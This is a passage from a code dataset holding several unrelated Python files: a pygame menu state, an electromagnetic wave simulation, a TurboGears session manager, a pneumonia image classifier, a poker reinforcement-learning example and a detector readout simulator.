self.data_to_persist[\"level_data\"]\n self.best_steps = self.current_save.get_best_score_for_level(\n 
self.current_level.level_number\n )\n self.options = [\n TextUIOption(\"Next\", 0, self._continue),\n TextUIOption(\"Retry\", 1, self._retry),\n ]\n self.background_surf = self.data_to_persist[\"surfaces\"]\n\n best_string = \"\"\n\n if self.best_steps is not None:\n best_string = \"Best-{}\".format(self.best_steps)\n\n self.complete_text_panel = TextPanel(\"Level Complete!\")\n self.complete_score_panel = TextPanel(\n \"Steps-{} {}\".format(self.steps, best_string),\n self.complete_text_panel.get_size(),\n screen_position=pygame.Vector2(0, self.complete_text_panel.get_size().y),\n )\n\n self.complete_options_panel = TextOptionsUIPanel(\n pygame.Vector2(self.complete_text_panel.get_size().x, 35),\n self.options,\n screen_position=pygame.Vector2(\n 0,\n self.complete_text_panel.get_size().y\n + self.complete_score_panel.get_size().y,\n ),\n )\n\n size = pygame.Vector2(\n x=max(\n self.complete_options_panel.get_size().x,\n self.complete_score_panel.get_size().x,\n self.complete_text_panel.get_size().x,\n ),\n y=self.complete_options_panel.get_size().y\n + self.complete_score_panel.get_size().y\n + self.complete_text_panel.get_size().y,\n )\n self.surf = pygame.Surface(size)\n # self._save()\n\n def _continue(self):\n self._save()\n self.data_to_persist[\"level_to_load\"] = self.current_save.get_next_level()\n self.data_to_persist[\"current_player\"] = self.current_save\n self.state_machine.change_state(\"GAME\")\n\n def _save(self):\n self.current_save.upsert_level_data(\n self.current_level.level_name,\n self.current_level.level_number,\n self.steps,\n )\n self.state_machine.get_data(\"SAVE_MANAGER\").save()\n\n def _retry(self):\n self._save()\n self.data_to_persist[\"level_to_load\"] = self.current_level.level_number\n self.data_to_persist[\"current_player\"] = self.current_save\n self.state_machine.change_state(\"GAME\")\n\n def update(self, current_time):\n super().update(current_time)\n self._build_surfaces()\n\n def handle_events(self, events):\n super().handle_events(events)\n for event in events:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n self.complete_options_panel.previous_option()\n if event.key == pygame.K_DOWN:\n self.complete_options_panel.next_option()\n if event.key == pygame.K_RETURN:\n self.complete_options_panel.current_option.select()\n\n def _build_surfaces(self):\n self.surfaces = []\n self.surfaces.append({\"surface\": self.background_surf, \"position\": None})\n self.surf.blit(\n self.complete_options_panel.surf,\n self.complete_options_panel.screen_position,\n )\n self.surf.blit(\n self.complete_text_panel.surf, self.complete_text_panel.screen_position\n )\n self.surf.blit(\n self.complete_score_panel.surf, self.complete_score_panel.screen_position\n )\n self.surfaces.append({\"surface\": self.surf, \"position\": None})\n","sub_path":"states/LevelCompleteState.py","file_name":"LevelCompleteState.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"445883723","text":"import numpy as np\nimport scipy.special\nimport cmath\nimport math\n\nimport multiprocessing as mp\n\n\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\n\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\nfrom mpl_toolkits.mplot3d import proj3d\nfrom matplotlib.animation import FuncAnimation\nfrom scipy.sparse.linalg import eigsh\nfrom scipy import sparse\nfrom sparse_dot_mkl import 
dot_product_mkl\n\n\n\n\n\ngrid_size = (200, 200)\nlight_speed = 3 * 10**8  # changes the smoothness of the surface; with the physical value the wave really moves and the initial wave is normal\nelectric_constant = 8.854 * 10**(-12)\nmagnetic_constant = 1.256 * 10**(-6)\n# light_speed = 1 # can change smoothness of surface\n# electric_constant = 1\n# magnetic_constant = 1\nmesh_step = 0.1  # changes the number of peaks; 0.1 is good\nnum_of_frames = 75\ntime_step = 0.00000000004\nelectric_direction = np.array((0, 1, 0))\nk = np.array((1, 0, 0))\nE_0 = 10\nallowed_error = 10**(-13)\nmax_order_of_chebyshev_poly = 100000\ndisplay_size_step = 2\n\n\nfree_plane = np.array([-grid_size[0] / 2, -grid_size[1] / 2, grid_size[0] / 2, grid_size[1] /2]) * mesh_step\nfree_plane_length = (grid_size[0] * mesh_step, grid_size[1] * mesh_step)\npacket_center = (0, 0)\npacket_size = (0.06875 * free_plane_length[0], 0.05 * free_plane_length[1], 0.05 * free_plane_length[1])\noperator_size = (grid_size[0] + 1) * (grid_size[1] + 1) * 3\n\nelectric_coeff_sqrt = math.sqrt(electric_constant)\nmagnetic_coeff_sqrt = math.sqrt(magnetic_constant)\n\n\nelectric_direction = electric_direction / np.linalg.norm(electric_direction)\nk_direction = k / np.linalg.norm(k)\n\ndef E(x, y, z):\n    return np.array([-electric_direction[1] * y / 2 / packet_size[1]**2 - electric_direction[2] * z / 2 / packet_size[2], -electric_direction[1] * (-x / 2 / packet_size[0]**2 + k[0] * 1j), -electric_direction[2] * (-x / 2 / packet_size[0]**2 + k[0] * 1j)]) * 1j * E_0 * math.pi**(3/2) / (packet_size[0] * packet_size[1] * packet_size[2]) * cmath.exp(1j * k[0] * x) * cmath.exp(-(x/2/packet_size[0])**2-(y/2/packet_size[1])**2-(z/2/packet_size[2])**2)\n\n\ndef B(x, y, z):\n    return np.cross(k_direction, E(x, y, z)) / light_speed\n\n\n\ndef get_discretized_init_wave_function():\n    xs = np.linspace(free_plane[0], free_plane[2], grid_size[0] + 1)\n    ys = np.linspace(free_plane[1], free_plane[3], grid_size[1] + 1)\n    es = np.empty((operator_size))\n    i = 0\n    for y in ys:\n        for x in xs:\n            curr_E = E(x, y, 0)\n            curr_B = np.cross(k_direction, curr_E) / light_speed\n            curr_Y = [x.real * electric_coeff_sqrt for x in curr_E]\n            curr_X = [x.real / magnetic_coeff_sqrt for x in curr_B]\n            es[i * 3] = curr_Y[0]\n            es[i * 3 + 1] = curr_Y[1]\n            es[i * 3 + 2] = curr_X[2]\n            i += 1\n    return es\n\n\n\n\ndef flatten_hamiltonian(i, j):\n    rows = [np.zeros((grid_size[1] + 1, grid_size[0] + 1, 3)) for m in range(3)]\n    if j + 1 <= grid_size[1]:\n        rows[0][j + 1][i][2] = 1\n    if j - 1 >= 0:\n        rows[0][j - 1][i][2] = -1\n    rows[0] /= electric_coeff_sqrt * magnetic_coeff_sqrt * 2 * mesh_step\n\n    if i + 1 <= grid_size[0]:\n        rows[1][j][i + 1][2] = -1\n    if i - 1 >= 0:\n        rows[1][j][i - 1][2] = 1\n    rows[1] /= electric_coeff_sqrt * magnetic_coeff_sqrt * 2 * mesh_step\n\n    if j + 1 <= grid_size[1]:\n        rows[2][j + 1][i][0] = 1\n    if j - 1 >= 0:\n        rows[2][j - 1][i][0] = -1\n    if i + 1 <= grid_size[0]:\n        rows[2][j][i + 1][1] = -1\n    if i - 1 >= 0:\n        rows[2][j][i - 1][1] = 1\n    rows[2] /= electric_coeff_sqrt * magnetic_coeff_sqrt * 2 * mesh_step\n\n    return sparse.vstack([sparse.csr_matrix(row.flatten()) for row in rows])\n\ndef flatten_hamiltonian_row(j):\n    h_rows = [flatten_hamiltonian(i, j) for i in range(grid_size[0] + 1)]\n    return sparse.vstack(h_rows)\n\ndef get_hamiltonian():\n    pool = mp.Pool(mp.cpu_count())\n    hamiltonian = pool.map(flatten_hamiltonian_row, range(grid_size[1] + 1))\n    # for j in range(grid_size[1] + 1):\n    #     for i in range(grid_size[0] + 1):\n    #         hamiltonian.append(flatten_hamiltonian(i, j))\n    #     print(j)\n    
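# Orientation note: each flatten_hamiltonian_row(j) block has 3 * (grid_size[0] + 1)\n    # rows, so stacking the grid_size[1] + 1 blocks below gives a square operator of\n    # side operator_size. A minimal sanity check (commented out so the matrix is not\n    # built twice):\n    #   H_full = sparse.vstack(hamiltonian)\n    #   assert H_full.shape == (operator_size, operator_size)\n    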
pool.close()\n return sparse.vstack(hamiltonian)\n\n\nT_tilde_matrices = [None, sparse.identity(operator_size)]\ndef next_T_tilde_matrix(B):\n if T_tilde_matrices[0] is None:\n T_tilde_matrices[0] = T_tilde_matrices[1]\n T_tilde_matrices[1] = B\n return T_tilde_matrices[1]\n else:\n next_T_tilde = B * 2 * T_tilde_matrices[1] - T_tilde_matrices[0]\n T_tilde_matrices[0] = T_tilde_matrices[1]\n T_tilde_matrices[1] = next_T_tilde\n return next_T_tilde\n\n\nH = get_hamiltonian()\n# using recursion formula for chebyshev polynomial. x's range is R rather than [-1, 1]\ndef get_evolution_operator_one_timestep():\n print(H.shape)\n eigen_factor = 2\n # print(\"det(H) : {}\".format(scipy.linalg.det(H)))\n # max_eigenvalue = eigsh(H, k=1, which=\"LA\")[0][0]\n # min_eigenvalue = eigsh(H, k=1, which=\"SA\")[0][0]\n max_eigenvalue = 16\n min_eigenvalue = -16\n print(\"max_eigenvalue : {}\".format(max_eigenvalue))\n print(\"min_eigenvalue : {}\".format(min_eigenvalue))\n z = (max_eigenvalue - min_eigenvalue) * time_step / eigen_factor\n B = ((H - sparse.identity(operator_size) * (max_eigenvalue + min_eigenvalue) / 2) / (max_eigenvalue - min_eigenvalue)) * (-1j) * eigen_factor\n # print(\"det(B) : {}\".format(scipy.linalg.det(B)))\n evolution_operator = sparse.csr_matrix((operator_size, operator_size), dtype=np.complex128)\n jv = 1\n i = 1\n while abs(jv) > allowed_error and i <= max_order_of_chebyshev_poly:\n jv = scipy.special.jv(i, z)\n # evolution_operator += jv * next_T_tilde_matrix(B)\n tmpT = jv * next_T_tilde_matrix(B) * (1j)**i\n print(i)\n # if sparse.linalg.det(tmpT) == 0:\n # print(\"{}\".format(i))\n evolution_operator += tmpT\n i += 1\n evolution_operator = (evolution_operator * 2 + sparse.identity(operator_size, dtype=np.complex128) * scipy.special.jv(0, z)) * np.exp((max_eigenvalue + min_eigenvalue) * time_step * 0.5)\n print(\"{} : {}\".format(i, abs(jv)))\n # detm = scipy.linalg.det(evolution_operator * evolution_operator.transpose().conj())\n # factor = pow(1 / detm, 1 / operator_size)\n # evolution_operator *= factor\n # print(\"{}\".format(scipy.linalg.det(evolution_operator * evolution_operator.transpose().conj())))\n return sparse.csr_matrix(evolution_operator).real\n\ndef normalize_wave(wave):\n unflattened = np.reshape(wave, ((grid_size[1] + 1) * (grid_size[0] + 1), 3))\n integral = sum([np.linalg.norm(v)**2 for v in unflattened]) / 2 * mesh_step**2\n factor = math.sqrt(1/integral)\n return wave * factor\n\nevolution_operator = get_evolution_operator_one_timestep()\nevolution_operator.data = np.ascontiguousarray(evolution_operator.data) # dot_product_mkl requires contiguous data\ncurrent_wave = get_discretized_init_wave_function()\ndef propagate_wave(steps=1):\n global current_wave\n # print(current_wave.dtype)\n # print(evolution_operator.dtype)\n # current_wave = evolution_operator.dot(fake_border(current_wave))\n for i in range(steps):\n # current_wave = normalize_wave(evolution_operator.dot(fake_border(current_wave)))\n # current_wave = normalize_wave(apply_damping(evolution_operator.dot(current_wave), damping_factor=0.9, border_size=6))\n # current_wave = normalize_wave(evolution_operator.dot(current_wave))\n current_wave = normalize_wave(dot_product_mkl(evolution_operator, current_wave))\n return current_wave\n\ndef wave2energe(wave):\n unflattened = np.reshape(wave, (grid_size[1] + 1, grid_size[0] + 1, 3))[::display_size_step, ::display_size_step, ::]\n # print(unflattened.shape)\n dis = np.array([[np.linalg.norm(v)**2 for v in unflattened[j]] for j in 
range(int(grid_size[1] / display_size_step) + 1)]) * 0.5\n return dis\n\n\n\nxs = np.linspace(free_plane[0], free_plane[2], int(grid_size[0] / display_size_step) + 1)\nys = np.linspace(free_plane[1], free_plane[3], int(grid_size[1] / display_size_step) + 1)\nxs, ys = np.meshgrid(xs, ys)\n\n# draw the figure\ndef update_plot(frame_number):\n ax.clear()\n # ax.set_zlim(0, 0.32 / grid_size[0])\n # ax.set_xlim(0, free_plane_length[0])\n # ax.set_ylim(0, free_plane_length[1])\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.invert_xaxis()\n propagate_wave(steps=8)\n dis = wave2energe(current_wave)\n ax.plot_surface(xs, ys, dis, cmap=\"coolwarm\")\n # es = energy_density(0)[::display_size_step, ::display_size_step]\n # ax.plot_surface(xs, ys, es, cmap=\"coolwarm\")\n print(\"{} : {} : {}\".format(frame_number, ax.elev, ax.azim))\n\nWriter = animation.writers['ffmpeg']\nwriter = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\nx_scale=1\ny_scale=1\nz_scale=1\n\nscale=np.diag([x_scale, y_scale, z_scale, 1.0])\nscale=scale*(1.0/scale.max())\nscale[3,3]=1.0\n\ndef short_proj():\n return np.dot(Axes3D.get_proj(ax), scale)\n\nax.get_proj=short_proj\nax.elev = 75\nax.azim = -90\n\nani = FuncAnimation(fig, update_plot, num_of_frames, interval=1, repeat=False)\nani.save('maxwell_2d.mp4', writer=writer)\n\n# plt.show()\n","sub_path":"maxwell_2d.py","file_name":"maxwell_2d.py","file_ext":"py","file_size_in_byte":9309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"485612551","text":"#!/bin/python3\n\nimport constants as ct\nimport os\n\ndef getDomain(fileName, equipmentType):\n file = open(fileName)\n headers = file.readline().rstrip().split()\n line = file.readline()\n domain = []\n while line:\n newItem = {}\n values = [float(x) for x in line.rstrip().split()]\n values[0] = int(values[0])\n for i in range(1, len(headers)):\n newItem[headers[i]] = values[i]\n domain.append(newItem)\n line = file.readline()\n file.close()\n return domain\ndef readDomains(domainsPath):\n domains = {}\n for fileNm in os.listdir(domainsPath):\n eqType = fileNm.split('.')[0]\n domains[eqType] = getDomain(domainsPath + fileNm, eqType)\n return domains","sub_path":"TP2/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"64274391","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\turbogears\\visit\\sovisit.py\n# Compiled at: 2011-03-26 09:20:09\nfrom datetime import datetime\nfrom sqlobject import SQLObject, SQLObjectNotFound, StringCol, DateTimeCol\nfrom sqlobject.sqlbuilder import Update\nfrom turbogears import config\nfrom turbogears.database import PackageHub\nfrom turbogears.util import load_class\nfrom turbogears.visit.api import BaseVisitManager, Visit\nhub = PackageHub('turbogears.visit')\n__connection__ = hub\nimport logging\nlog = logging.getLogger('turbogears.visit.sovisit')\nvisit_class = None\n\nclass SqlObjectVisitManager(BaseVisitManager):\n __module__ = __name__\n\n def __init__(self, timeout):\n global visit_class\n visit_class_path = config.get('visit.soprovider.model', 'turbogears.visit.sovisit.TG_Visit')\n visit_class = load_class(visit_class_path)\n if visit_class:\n log.info(\"Successfully loaded '%s'\", 
visit_class_path)\n super(SqlObjectVisitManager, self).__init__(timeout)\n\n def create_model(self):\n hub.begin()\n visit_class.createTable(ifNotExists=True)\n hub.commit()\n hub.end()\n log.debug('Visit model database table(s) created.')\n\n def new_visit_with_key(self, visit_key):\n hub.begin()\n visit_class(visit_key=visit_key, expiry=datetime.now() + self.timeout)\n hub.commit()\n hub.end()\n return Visit(visit_key, True)\n\n def visit_for_key(self, visit_key):\n \"\"\"Return the visit for this key.\n\n Returns None if the visit doesn't exist or has expired.\n\n \"\"\"\n try:\n expiry = self.queue[visit_key]\n except KeyError:\n visit = visit_class.lookup_visit(visit_key)\n if not visit:\n return\n expiry = visit.expiry\n\n now = datetime.now()\n if expiry < now:\n return\n self.update_visit(visit_key, now + self.timeout)\n return Visit(visit_key, False)\n\n def update_queued_visits(self, queue):\n if hub is None:\n return\n hub.begin()\n try:\n conn = hub.getConnection()\n try:\n for (visit_key, expiry) in queue.items():\n u = Update(visit_class.q, {visit_class.q.expiry.fieldName: expiry}, where=visit_class.q.visit_key == visit_key)\n conn.query(conn.sqlrepr(u))\n\n hub.commit()\n except:\n hub.rollback()\n raise\n\n finally:\n hub.end()\n return\n\n\nclass TG_Visit(SQLObject):\n __module__ = __name__\n\n class sqlmeta:\n __module__ = __name__\n table = 'visit'\n\n visit_key = StringCol(length=40, alternateID=True, alternateMethodName='by_visit_key')\n created = DateTimeCol(default=datetime.now)\n expiry = DateTimeCol()\n\n @classmethod\n def lookup_visit(cls, visit_key):\n try:\n return cls.by_visit_key(visit_key)\n except SQLObjectNotFound:\n return\n\n return","sub_path":"pycfiles/TurboGears-1.5.1-py2.4/sovisit.py","file_name":"sovisit.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"197903467","text":"class Event: #55 lines\r\n \r\n global numberOfTeams\r\n numberOfTeams = 0\r\n \r\n def __init__(self, name): #modified\r\n newEvent = name\r\n if newEvent == \"\":\r\n raise ValueError(\"Event.__init__: Instance cannot be created with a blank name.\")\r\n else:\r\n self.name = newEvent\r\n self.teams = []\r\n \r\n def addTeam(self, name): #modified\r\n global numberOfTeams\r\n \r\n newTeam = name #new\r\n #make sure this if doesn't need an else\r\n if newTeam == None:\r\n raise ValueError(\"Event.addTeam: Invalid team object; no changes made\")\r\n for i in range(0, numberOfTeams):\r\n if self.teams[i].getNumber() == newTeam.getNumber():\r\n raise ValueError(\"Event.addTeam: Team already registered for this event; no changes made\")\r\n if numberOfTeams < 20:\r\n if newTeam == None:\r\n raise ValueError(\"Event.addTeam: Team is not valid and cannot be added; no changes made\")\r\n else:\r\n self.teams.append(newTeam)\r\n numberOfTeams = numberOfTeams + 1\r\n return numberOfTeams\r\n else:\r\n raise ValueError(\"Event.addTeam: You may not have more than 20 teams\")\r\n \r\n def removeTeam(self, number):\r\n global numberOfTeams\r\n if numberOfTeams == 0:\r\n raise ValueError(\"Event.removeTeam: There are no teams registered for this event\")\r\n for i in range(0, numberOfTeams):\r\n if self.teams[i].getNumber() == number:\r\n self.teams.remove(self.teams[i])\r\n numberOfTeams = numberOfTeams - 1\r\n return numberOfTeams\r\n elif i == (numberOfTeams - 1):\r\n raise ValueError(\"Event.removeTeam: The desired team was not found in this event\")\r\n \r\n def getName(self):\r\n return 
self.name\r\n \r\n def getTeamCount(self):\r\n return numberOfTeams\r\n \r\n def getTeamByNumber(self, number):\r\n for i in range(0, numberOfTeams):\r\n if self.teams[i].getNumber() == number:\r\n return self.teams[i]\r\n elif i == (numberOfTeams - 1):\r\n raise ValueError(\"Event.getTeamByNumber: This team is not on this event.\")\r\n \r\n def getTeamByParticipant(self, number):\r\n foundTeam = False\r\n for i in range(0, len(self.teams)):\r\n for j in range(0, len(self.teams[i].participants)):\r\n if self.teams[i].participants[j].getNumber() == number:\r\n return self.teams[i]\r\n if foundTeam == False:\r\n raise ValueError(\"Event.getTeamByParticipant: This participant is not on this event.\")","sub_path":"Auburn school projects [archive]/U. Fa2013/5700 Process [Python]/eclipse workspace[code for CA:Code Assnmnts]/aew0024/CA02/prod/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"29085823","text":"import os\nimport fileinput\nimport sys\nfrom optparse import OptionParser\n\nparser = OptionParser()\nparser.add_option(\"-p\", \"--path\", dest=\"directory\",\n help=\"Specify input directory containing the .root files.\", metavar=\"PATH\")\nparser.add_option(\"-t\", \"--tag\", dest=\"tag\",\n help=\"Specify name of sample to make list and output .txt file.\", metavar=\"TAG\")\nparser.add_option(\"-y\", \"--year\", dest=\"year\",\n help=\"Specify year of produced sample.\", metavar=\"YEAR\")\n\n(options, args) = parser.parse_args()\n\ndirectory = options.directory\ntag = options.tag\nyeartag = options.year\n\nif not directory:\n sys.exit(\"You need to specify the directory! (See help).\")\nif not tag:\n sys.exit(\"You need to specify sample name.\")\n\nfor folder in os.listdir(directory):\n if folder.startswith(tag) and not folder.endswith('.root'):\n for rootfile in os.listdir(directory+folder):\n if not yeartag:\n with open('samples/Efficiency/'+tag+'.txt', 'a') as ofile:\n ofile.write(directory+folder+'/'+rootfile + os.linesep)\n else:\n with open('samples/Efficiency/'+tag+'_'+yeartag+'.txt', 'a') as ofile:\n ofile.write(directory+folder+'/'+rootfile + os.linesep)\n","sub_path":"scripts/makeEffList.py","file_name":"makeEffList.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"399054306","text":"# import pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport numpy as np\nimport cv2\nfrom keras import applications, Sequential, Model, optimizers\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping\nfrom keras.layers import Flatten, Dense\nfrom keras.utils import to_categorical\nfrom tqdm import tqdm\nimport os\nimport skimage.transform\n\ntrainInput = \"chest-xray-pneumonia/chest_xray/chest_xray/train/\"\ntestInput = \"chest-xray-pneumonia/chest_xray/chest_xray/test/\"\nsize = 199\nbatchSize = 32\nepochs = 3\n\n\ndef extractData(directory):\n labels = []\n images = []\n\n for nextDirectory in os.listdir(directory):\n if not nextDirectory.startswith(\".\"):\n if nextDirectory in \"NORMAL\":\n label = 0\n elif nextDirectory in \"PNEUMONIA\":\n label = 1\n else:\n label = 2\n\n currentDirectory = directory + nextDirectory\n if not currentDirectory.startswith(\".\"):\n for files in tqdm(os.listdir(currentDirectory)):\n if files.endswith('.jpg') or files.endswith('.jpeg'):\n imagePath = currentDirectory + \"/\" + files\n img = 
cv2.imread(imagePath)\n                        img = skimage.transform.resize(img, (size, size, 3))\n                        img = np.asarray(img)\n                        labels.append(label)\n                        images.append(img)\n                        # cv2.imshow('image', img)\n                        # cv2.waitKey(0)\n                        # cv2.destroyAllWindows()\n\n    labels = np.asarray(labels)\n    images = np.asarray(images)\n    return labels, images\n\n\nlabelsTrain, imagesTrain = extractData(trainInput)\nlabelsTest, imagesTest = extractData(testInput)\n\n# imagesTrain = imagesTrain.reshape(5216, 3, size, size)\n# imagesTest = imagesTest.reshape(624, 3, size, size)\n# One-hot encode the integer labels; categorical_crossentropy with the\n# Dense(2, softmax) head below expects labels of shape (N, 2), not (N,).\nlabelsTrain = to_categorical(labelsTrain, 2)\nlabelsTest = to_categorical(labelsTest, 2)\nprint(\"Train:\", imagesTrain.shape, \"Test:\", imagesTest.shape)\nprint(\"Train:\", labelsTrain.shape, \"Test:\", labelsTest.shape)\n\ninceptionv3 = applications.InceptionV3(weights='imagenet', include_top=False, input_shape=(size, size, 3))\naddModel = Sequential()\n\naddModel.add(Flatten(input_shape=inceptionv3.output_shape[1:]))\naddModel.add(Dense(256, activation='relu'))\naddModel.add(Dense(128, activation='relu'))\naddModel.add(Dense(2, activation='softmax'))\n\nmodelv3 = Model(inputs=inceptionv3.input, outputs=addModel(inceptionv3.output))\nmodelv3.compile(loss='categorical_crossentropy', optimizer=optimizers.SGD(lr=1e-4, momentum=0.9), metrics=['accuracy'])\n\n# reduceLearningRate = ReduceLROnPlateau(monitor='val_acc', factor=0.1, epsilon=0.0001, patience=1, verbose=1)\n\nreduceLearningRate = ReduceLROnPlateau(monitor='loss', factor=0.1, patience=2, cooldown=2, min_lr=0.001, verbose=1)\nearlyStop = EarlyStopping(monitor='val_loss', patience=5, verbose=1)\n\ncallbacks = [reduceLearningRate, earlyStop]\n\ntimeStart = time.time()\nhistory = modelv3.fit(imagesTrain, labelsTrain,\n                      validation_data=(imagesTest, labelsTest),\n                      callbacks=[reduceLearningRate, earlyStop], epochs=epochs)\nprint(\"InceptionV3 model\", str(round((time.time() - timeStart) / 60, 2)))\n\n\"\"\"History in graphs\"\"\"\n\nplt.plot(history.history[\"accuracy\"])\nplt.plot(history.history[\"val_accuracy\"])\nplt.title(\"Accuracy\")\nplt.ylabel(\"Accuracy\")\nplt.xlabel(\"Epoch\")\nplt.legend([\"Train\", \"Test\"], loc=\"upper left\")\nplt.show()\n\nplt.plot(history.history[\"loss\"])\nplt.plot(history.history[\"val_loss\"])\nplt.title(\"Loss\")\nplt.ylabel(\"Loss\")\nplt.xlabel(\"Epoch\")\nplt.legend([\"Train\", \"Test\"], loc=\"upper left\")\nplt.show()\n","sub_path":"PneumoniaDetect.py","file_name":"PneumoniaDetect.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"399054306","text":"''' An example of learning an NFSP Agent on Limit Texas Holdem\n'''\n\nimport tensorflow as tf\n\nimport rlcard\nfrom rlcard.agents.nfsp_agent import NFSPAgent\nfrom rlcard.agents.random_agent import RandomAgent\nfrom rlcard.utils.utils import set_global_seed\nfrom rlcard.utils.logger import Logger\n\n# Make environment\nenv = rlcard.make('limit-holdem')\neval_env = rlcard.make('limit-holdem')\n\n# Set the iteration numbers and how frequently we evaluate/save the plot\nevaluate_every = 100\nsave_plot_every = 1000\nevaluate_num = 10000\nepisode_num = 10000000\n\n# Set the number of steps for collecting normalization statistics\n# and the initial memory size\nmemory_init_size = 1000\nnorm_step = 1000\n\n# The paths for saving the logs and learning curves\nroot_path = './experiments/limit_holdem_nfsp_result/'\nlog_path = root_path + 'log.txt'\ncsv_path = root_path + 'performance.csv'\nfigure_path = root_path + 'figures/'\n\n# Set a 
global seed\nset_global_seed(0)\n\nwith tf.Session() as sess:\n # Set agents\n global_step = tf.Variable(0, name='global_step', trainable=False)\n agents = []\n for i in range(env.player_num):\n agent = NFSPAgent(sess,\n scope='nfsp' + str(i),\n action_num=env.action_num,\n state_shape=env.state_shape,\n hidden_layers_sizes=[512,512],\n anticipatory_param=0.1,\n min_buffer_size_to_learn=memory_init_size,\n q_replay_memory_init_size=memory_init_size,\n q_norm_step=norm_step,\n q_mlp_layers=[512,512])\n agents.append(agent)\n\n sess.run(tf.global_variables_initializer())\n\n random_agent = RandomAgent(action_num=eval_env.action_num)\n\n env.set_agents(agents)\n eval_env.set_agents([agents[0], random_agent])\n\n # Count the number of steps\n step_counters = [0 for _ in range(env.player_num)]\n\n # Init a Logger to plot the learning curve\n logger = Logger(xlabel='timestep', ylabel='reward', legend='NFSP on Limit Texas Holdem', log_path=log_path, csv_path=csv_path)\n\n for episode in range(episode_num):\n\n # First sample a policy for the episode\n for agent in agents:\n agent.sample_episode_policy()\n\n # Generate data from the environment\n trajectories, _ = env.run(is_training=True)\n\n # Feed transitions into agent memory, and train the agent\n for i in range(env.player_num):\n for ts in trajectories[i]:\n agents[i].feed(ts)\n step_counters[i] += 1\n\n # Train the agent\n train_count = step_counters[i] - (memory_init_size + norm_step)\n if train_count > 0 and train_count % 64 == 0:\n rl_loss = agents[i].train_rl()\n sl_loss = agents[i].train_sl()\n print('\\rINFO - Agent {}, step {}, rl-loss: {}, sl-loss: {}'.format(i, step_counters[i], rl_loss, sl_loss), end='')\n\n # Evaluate the performance. Play with random agents.\n if episode % evaluate_every == 0:\n reward = 0\n for eval_episode in range(evaluate_num):\n _, payoffs = eval_env.run(is_training=False)\n reward += payoffs[0]\n\n logger.log('\\n########## Evaluation ##########')\n logger.log('Timestep: {} Average reward is {}'.format(env.timestep, float(reward)/evaluate_num))\n\n # Add point to logger\n logger.add_point(x=env.timestep, y=float(reward)/evaluate_num)\n\n # Make plot\n if episode % save_plot_every == 0 and episode > 0:\n logger.make_plot(save_path=figure_path+str(episode)+'.png')\n\n # Make the final plot\n logger.make_plot(save_path=figure_path+'final_'+str(episode)+'.png')\n","sub_path":"examples/limit_holdem_nfsp.py","file_name":"limit_holdem_nfsp.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"479885056","text":"from astropy.io import fits\nfrom astropy.io import ascii\nfrom make_random_trace import make_random_trace\nimport numpy as np\nimport numpy.polynomial.polynomial as poly\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter, AutoMinorLocator)\nimport datetime\nimport os\nimport shutil\nimport json\nimport re\nimport sys\n\nplt.style.use('seaborn-white')\nsys.stdout.flush()\n\n\ndef MACCsimulator( ng=15, nf=16, nd=11, darkcurrent = 0.04, lightcurrent = 10., \n nonlin = -5.0e-5, readnoise = 9., \n RTN1 = False, RTN2 = False, RTN3 = False,\n plots = True ):\n\n\n # Frame time\n tf = 1.4548 # tf = 1.42 in DPU test Sec. 8.2.\n\n # FP average e-/ADU gain\n detGain = 1.3 # detGain = 1/1.4 DPU test; typos \"8.4\"?\n\n # Dark current e-/sec\n # darkrkcurrent = 0.04 nominal\n\n # Light current e-/sec\n # lightcurrent = 10. 52 is LED set point. 
2 is Zody.\n\n # Non-linearity 2nd order coefficent\n # nonlin = -5.0e-5 \n\n # ADU offset added by DPU\n offsetADU = 0. # offsetADU = 1024 or 0 depends on DPU or ground fitting.\n\n # readnoise in e-. 9-10 e- per frame is nominal.\n sigmaRead = readnoise/detGain # ADU\n\n # noiseless total fluence\n fluence = ( darkcurrent + lightcurrent )/ detGain # ADU/sec\n\n # group and integration times\n tgrp = (nf + nd)*tf\n tint = (ng-1.)*(nf+nd)*tf\n\n # Readout count\n nreads = int((ng*nf + (ng-1.)*nd))\n\n # Total exposure time\n texp = nreads*tf\n\n # time vector\n read = np.arange(nreads)\n tread = read*tf\n\n fdark = fluence*tread + nonlin*((fluence*tread)**2) # curved signal\n\n ## Sone references from the DPU Manual\n ## P. 48 test\n ##myPixel = [511, 511]\n ##myPixelSlope = 2.179638\n ##myPixelChi2Temp = 30.748461\n ##myPixelSignal = 31.0 \n\n # Add read noise\n rg = np.random.rand(nreads) \n fdarkN = fdark + rg * sigmaRead / np.max(rg) \n\n ## Some testing\n ##y[Range(9,12)] += np.float([5,10,7]) # make some peak\n ## define a model: GaussModel + background polynomial\n ##gauss = GaussModel( ) # Gaussian\n ##gauss 